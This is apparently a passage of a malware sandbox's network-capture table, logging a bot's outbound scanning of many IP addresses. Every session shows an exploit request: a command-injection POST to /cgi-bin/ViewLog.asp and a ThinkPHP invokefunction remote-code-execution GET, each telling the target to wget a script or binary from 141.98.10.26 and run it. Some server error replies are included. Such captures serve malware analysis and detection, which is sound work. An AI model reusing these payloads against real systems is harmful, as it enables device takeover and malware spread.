Nov 22, 2023 08:40:21.502619028 CET	18418	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:30.461364031 CET	19455	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:49.914752960 CET	19771	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
856	192.168.2.23	37738	94.110.48.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.882836103 CET	17341	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
857	192.168.2.23	59668	94.246.155.111	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.891990900 CET	17341	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.103009939 CET	17348	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Data Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 2f 31 2e 30 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e Data Ascii: <body><h1>HTTP/1.0 400 Bad Request</h1></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
858	192.168.2.23	45716	94.253.103.249	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.917282104 CET	17342	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.142616987 CET	17358	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
859	192.168.2.23	49908	94.121.187.17	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.919795990 CET	17343	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
860	192.168.2.23	50970	94.121.25.83	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.920516968 CET	17344	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
861	192.168.2.23	40338	94.120.237.44	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.920586109 CET	17344	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
862	192.168.2.23	46388	94.120.155.237	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:12.923892975 CET	17345	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
863	192.168.2.23	49110	94.183.182.73	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.191656113 CET	17360	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
864	192.168.2.23	49096	94.74.98.72	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.193399906 CET	17360	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
865	192.168.2.23	49116	94.74.98.72	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.360204935 CET	17422	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:14.975527048 CET	17592	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
866	192.168.2.23	46848	94.24.37.46	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.653426886 CET	17452	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
867	192.168.2.23	59654	94.246.155.111	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.672012091 CET	17453	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.882742882 CET	17470	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Data Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 2f 31 2e 30 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e Data Ascii: <body><h1>HTTP/1.0 400 Bad Request</h1></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
868	192.168.2.23	53394	94.120.220.18	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.694482088 CET	17463	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
869	192.168.2.23	47178	94.123.254.206	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.695240021 CET	17464	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
870	192.168.2.23	33048	31.18.27.205	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.855061054 CET	17467	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
871	192.168.2.23	50176	62.245.152.18	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.856478930 CET	17467	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
872	192.168.2.23	60312	94.120.39.224	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.876830101 CET	17468	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
873	192.168.2.23	46922	95.85.185.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:13.905118942 CET	17471	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
874	192.168.2.23	60138	112.240.57.224	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:14.009558916 CET	17473	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.431642056 CET	17522	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.752479076 CET	17587	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:14 GMT Content-Type: text/html Content-Length: 161 Connection: close Server: QTL_Cache/1.2.15 X-Qtl-Cpu-Cycle-From-Cs: 30810 X-Via: 1.1 as-cn-sdzbcu5-cache-0005 [] Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 51 54 4c 5f 43 61 63 68 65 2f 31 2e 32 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>QTL_Cache/1.2.15</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
875	192.168.2.23	57204	88.85.64.141	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:14.083508968 CET	17475	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.263937950 CET	17486	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:14 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
876	192.168.2.23	38348	88.221.127.4	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:14.089061022 CET	17475	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.273226023 CET	17497	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:14 GMT Date: Wed, 22 Nov 2023 07:40:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 63 36 31 31 33 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 38 31 34 26 23 34 36 3b 66 65 62 31 31 64 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1c611302.1700638814.feb11d3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
877	192.168.2.23	52462	112.74.89.42	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.687196970 CET	17639	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:16.022228003 CET	17708	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:15 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
878	192.168.2.23	50954	112.16.229.39	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:15.759922028 CET	17700	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
